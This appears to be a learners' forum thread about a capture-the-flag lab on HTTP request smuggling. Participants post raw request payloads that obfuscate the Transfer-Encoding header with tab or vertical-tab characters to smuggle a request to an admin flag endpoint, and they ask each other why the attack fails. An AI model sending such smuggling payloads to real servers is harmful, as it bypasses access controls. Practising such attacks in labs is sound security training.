Hello,
I tried to validate the lesson with the example request but it doesn’t work :
POST / HTTP/1.1
Host: 206.189.26.78:30943
Content-Length: 46
Transfer-Encoding: chunked
0
GET /admin?reveal_flag=1 HTTP/1.1
Dummy:
Of corse \x20 between Transfer-Encoding: and the size has been replaced with \x09
I also tried to send the request with burp intruder and a null payload to have a request every 1s but the flag is never revealed.
Can you help me with that ? any clue 
Try to use other obfuscation methods explained previously and ensure you are sending the request to the right page.
I tried all the 5 techniques mentioned, no results. Did you solve it? (It is not admin.php, I am doing it through admin but I still get no result )
did you figue it out
POST / HTTP/1.1
Host: 94.237.54.190:37291
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding:[\x0b]chunked
3c
GET /admin?reveal_flag=1 HTTP/1.1
Content-Length: 11
x=1
0
I can figure it out either
How did you figure it out I am able to get a second 200 ok but there is no flag in the smuggle request.